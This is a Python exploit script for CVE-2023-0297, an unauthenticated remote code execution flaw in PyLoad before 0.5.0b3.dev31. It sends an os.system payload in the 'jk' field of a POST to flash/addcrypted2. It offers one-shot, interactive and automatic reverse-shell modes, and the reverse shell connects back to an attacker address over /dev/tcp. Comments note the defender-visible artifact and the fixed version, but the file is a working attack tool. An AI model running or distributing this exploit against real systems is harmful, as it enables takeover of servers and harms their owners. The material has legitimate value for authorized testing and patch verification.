# Exploit Title: PyLoad - Unauthenticated Remote Code Execution
# Date: 21-05-2023
# Exploit Author: Jacob Ebben
# Version: PyLoad < 0.5.0b3.dev31
# CVE: CVE-2023-0297
#!/usr/bin/env python3  # NOTE: a shebang is only honored when it is the very first line of the file
import argparse
import requests
import urllib3
import string
import json
from termcolor import colored
from random import choice
# Silences urllib3's InsecureRequestWarning for the whole process. That warning is
# only emitted when a request is made with verify=False; the single request in this
# file (POC.execute_command) keeps the requests default, so certificate verification
# stays on and this line only matters if verification were later disabled.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_message(message, type):
    """Print `message` behind a colored `[LEVEL]` tag chosen by `type`.

    `type` is one of SUCCESS, INFO, WARNING, ALERT or ERROR; any other
    value prints nothing. Returns None.
    """
    level_colors = {
        'SUCCESS': 'green',
        'INFO': 'blue',
        'WARNING': 'yellow',
        'ALERT': 'yellow',
        'ERROR': 'red',
    }
    color = level_colors.get(type)
    if color is None:
        return
    # The tag text is the level name itself, colored per the table above.
    print('[' + colored(type, color) + '] ' + message)
class POC:
    """Request builder for the PyLoad issue named in the file header.

    Stores the normalized target URL and an optional proxy mapping. A
    requests.Session is also created but never used: execute_command goes
    through the module-level requests.post.
    """

    def __init__(self, target, proxy):
        # Normalized so later string concatenation can assume a scheme and a trailing '/'.
        self.base_url = self._get_normalized_url(target)
        # Keyed by the target's scheme ('http' or 'https'); an empty dict means no proxy.
        self.proxies = self._get_proxies(self.base_url, proxy) if proxy else {}
        # NOTE(review): unused — see class docstring.
        self.session = requests.Session()

    def execute_command(self, command):
        """Send one POST to flash/addcrypted2 carrying `command`; returns None.

        The request is blind: the response is assigned and then dropped, and
        the status code is never checked, so a rejected or failed request is
        not reported (only a transport-level exception raised by requests
        would surface). For defenders, a POST to this endpoint whose `jk`
        field begins with `pyimport` is the observable artifact of this
        script; the header lists affected versions as < 0.5.0b3.dev31, so
        running a later build is the stated mitigation.
        """
        url = self.base_url + "flash/addcrypted2"
        payload = f"pyimport os;os.system(\"{command}\");f=function f2(){{}};"
        data = {
            "jk": payload,
            # Filler fields; random letters so each request body differs.
            "packages": self._random_string(8),
            "crypted": self._random_string(8),
            "passwords": self._random_string(8),
        }
        # TLS verification is left at the requests default (no verify=False here).
        response = requests.post(url, data=data, proxies=self.proxies)

    def _random_string(self, length=16):
        """Return `length` random ASCII letters (non-cryptographic `random.choice`)."""
        # The f-string around string.ascii_letters is redundant; it yields the same value.
        return ''.join(choice(f"{string.ascii_letters}") for i in range(length))

    def _get_normalized_url(self, url):
        """Return `url` with a trailing '/' and an http:// scheme if none was given.

        Only the first 7-8 characters are inspected for a scheme. An empty
        string raises IndexError at `url[-1]`.
        """
        if url[-1] != '/':
            url += '/'
        if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
            url = "http://" + url
        return url

    def _get_proxies(self, target_url, proxy_url):
        """Build the requests `proxies` dict: {target scheme: normalized proxy URL}."""
        return {self._get_url_protocol(target_url): self._get_normalized_url(proxy_url)}

    def _get_url_protocol(self, url):
        """Return 'https' if `url` starts with https:// (case-insensitive), else 'http'."""
        if url[0:8].lower() == 'https://':
            return 'https'
        return 'http'
def main():
    """CLI entry point: parse arguments and drive POC.execute_command.

    Three modes, checked in this order: -I and -P both given, then -c, else
    an interactive prompt that exits on q / exit / quit / exit() / quit().
    Command output is never shown (see the INFO messages below); -x routes
    the request through an HTTP proxy.
    """
    parser = argparse.ArgumentParser(description="PyLoad - Unauthenticated Remote Code Execution")
    # NOTE: the trailing commas on the next four lines make each statement a
    # one-element tuple expression; harmless, but almost certainly unintended.
    parser.add_argument('-t', '--target', required=True, type=str, help="url of the vulnerable site (Example: \"http://127.0.0.1:8000/\" or \"https://pyload.example.xyz/py/\")"),
    parser.add_argument('-c','--command', default=None, type=str, help='bash command to execute for single command mode (Default: Disabled)'),
    parser.add_argument('-I','--atk-ip', default=None, type=str, help='ip address for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-P','--atk-port', default=None, type=str, help='port for automatic reverse shell (Default: Disabled)'),
    parser.add_argument('-x','--proxy', default=None, type=str, help='http proxy address (Example: http://127.0.0.1:8080/)')
    args = parser.parse_args()
    exploit = POC(args.target, args.proxy)
    # Both -I and -P are required for this branch; giving only one silently falls through.
    if args.atk_ip and args.atk_port:
        print_message('Running reverse shell. Check your listener!', "SUCCESS")
        reverse_shell = f"/bin/bash -c 'exec /bin/bash -i &>/dev/tcp/{args.atk_ip}/{args.atk_port} <&1'"
        exploit.execute_command(reverse_shell)
    elif args.command:
        print_message(f'Running your command: "{args.command}"!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        exploit.execute_command(args.command)
    else:
        print_message('Please enter your command below!', "SUCCESS")
        print_message('This is a blind RCE, so the results of your command will not be shown', "INFO")
        while True:
            command = input(colored('>> ', 'green'))
            # Any of these literal strings ends the loop; everything else is sent as-is.
            if command in {'q','exit','quit','exit()','quit()'}:
                exit()
            exploit.execute_command(command)
# Standard script guard: run main() only when executed directly, not on import.
if __name__ == "__main__":
    main()